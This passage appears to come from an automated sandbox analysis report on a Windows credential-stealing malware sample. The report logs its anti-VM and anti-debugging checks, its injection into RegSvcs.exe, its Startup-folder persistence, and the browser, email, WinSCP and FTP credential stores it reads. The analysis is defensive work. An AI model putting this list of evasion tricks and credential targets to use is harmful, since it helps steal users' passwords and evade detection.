Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595719
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595594
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595485
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595235
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595110
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594985
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594735
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594485
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594235
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594110
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593985
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593831
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593703
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593594
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593485
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599781
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599672
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599547
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599437
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599219
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599094
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598983
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598875
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598764
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598656
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598546
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598437
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598317
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598203
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598091
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597984
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597875
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597765
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597656Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597547Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597422Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597312Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597203Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597090Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596984Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596875Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596765Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596656Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596547Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596422Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596312Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596203Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596094Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595969Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595859Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595750Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595640Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595531Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595421Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595312Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595203Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595094Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594984Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594875Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594765Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594656Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594547Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
                    Source: RegSvcs.exe, 00000006.00000002.4471177683.0000000002B51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
                    Source: wscript.exe, 00000004.00000002.2168277804.0000017FEF6A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: RegSvcs.exe, 00000006.00000002.4471177683.0000000002B51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                    Source: cunila.exe, 00000002.00000002.2047345066.0000000003970000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2186790443.00000000003B2000.00000040.80000000.00040000.00000000.sdmp, cunila.exe, 00000005.00000002.2193256608.00000000039B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: hgfsZrw6
                    Source: cunila.exe, 00000005.00000002.2193256608.00000000039B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: VMwareVBoxESelect * from Win32_ComputerSystem
                    Source: wscript.exe, 00000004.00000002.2168277804.0000017FEF6A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: RegSvcs.exe, 00000003.00000002.2193400109.0000000005A8C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllB
                    Source: RegSvcs.exe, 00000006.00000002.4473771920.0000000005D60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\SAL987656700.exeAPI call chain: ExitProcess graph end nodegraph_0-98797
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeAPI call chain: ExitProcess graph end node

Anti Debugging

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00A17070 CheckRemoteDebuggerPresent, 3_2_00A17070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_008FEAA2 BlockInput, 0_2_008FEAA2
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_008B2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_008B2622
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_008842DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_008842DE
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_008A4CE8 mov eax, dword ptr fs:[00000030h] 0_2_008A4CE8
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_01394098 mov eax, dword ptr fs:[00000030h] 0_2_01394098
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_01395738 mov eax, dword ptr fs:[00000030h] 0_2_01395738
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_013956D8 mov eax, dword ptr fs:[00000030h] 0_2_013956D8
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Code function: 2_2_00544CE8 mov eax, dword ptr fs:[00000030h] 2_2_00544CE8
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Code function: 2_2_015CA2F8 mov eax, dword ptr fs:[00000030h] 2_2_015CA2F8
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Code function: 2_2_015CA298 mov eax, dword ptr fs:[00000030h] 2_2_015CA298
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Code function: 2_2_015C8C58 mov eax, dword ptr fs:[00000030h] 2_2_015C8C58
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Code function: 5_2_01327D20 mov eax, dword ptr fs:[00000030h] 5_2_01327D20
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Code function: 5_2_01326680 mov eax, dword ptr fs:[00000030h] 5_2_01326680
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Code function: 5_2_01327CC0 mov eax, dword ptr fs:[00000030h] 5_2_01327CC0
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_008E0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 0_2_008E0B62
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_008B2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_008B2622
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_008A083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_008A083F
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_008A09D5 SetUnhandledExceptionFilter, 0_2_008A09D5
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_008A0C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_008A0C21
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Code function: 2_2_00552622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_00552622
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Code function: 2_2_0054083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_0054083F
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Code function: 2_2_005409D5 SetUnhandledExceptionFilter, 2_2_005409D5
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Code function: 2_2_00540C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 2_2_00540C21
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 5CC008
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 9FE008
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_008E1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,74745590,CreateProcessAsUserW,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle, 0_2_008E1201
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_008C2BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_008C2BA5
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_008EB226 SendInput,keybd_event, 0_2_008EB226
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_009022DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event, 0_2_009022DA
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\SAL987656700.exe"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\enterogenous\cunila.exe "C:\Users\user\AppData\Local\enterogenous\cunila.exe"
Source: C:\Users\user\AppData\Local\enterogenous\cunila.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\enterogenous\cunila.exe"
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_008E0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 0_2_008E0B62
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_008E1663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 0_2_008E1663
Source: SAL987656700.exe, 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp, cunila.exe, 00000002.00000002.2046156947.00000000005E2000.00000040.00000001.01000000.00000004.sdmp, cunila.exe, 00000005.00000002.2189121086.00000000005E2000.00000040.00000001.01000000.00000004.sdmp | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: SAL987656700.exe, cunila.exe | Binary or memory string: Shell_TrayWnd
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_008A0698 cpuid 0_2_008A0698
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_008F8195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW, 0_2_008F8195
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_008DD27A GetUserNameW, 0_2_008DD27A
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_008BB952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free, 0_2_008BB952
Source: C:\Users\user\Desktop\SAL987656700.exe | Code function: 0_2_008842DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_008842DE
Source: C:\Users\user\Desktop\SAL987656700.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match | File source: dump.pcap, type: PCAP
Source: Yara match | File source: 5.2.cunila.exe.39b0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.cunila.exe.39b0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RegSvcs.exe.3b0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.cunila.exe.3970000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.cunila.exe.3970000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000006.00000002.4471177683.0000000002B7E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2189912177.0000000002621000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2189912177.000000000264E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2186790443.00000000003B2000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4471177683.0000000002B66000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2047345066.0000000003970000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2193256608.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: cunila.exe PID: 7164, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 2316, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: cunila.exe PID: 1276, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 5376, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\FTP Navigator\Ftplist.txt
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: cunila.exe | Binary or memory string: WIN_81
Source: cunila.exe | Binary or memory string: WIN_XP
Source: cunila.exe, 00000005.00000002.2189121086.00000000005E2000.00000040.00000001.01000000.00000004.sdmp | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please 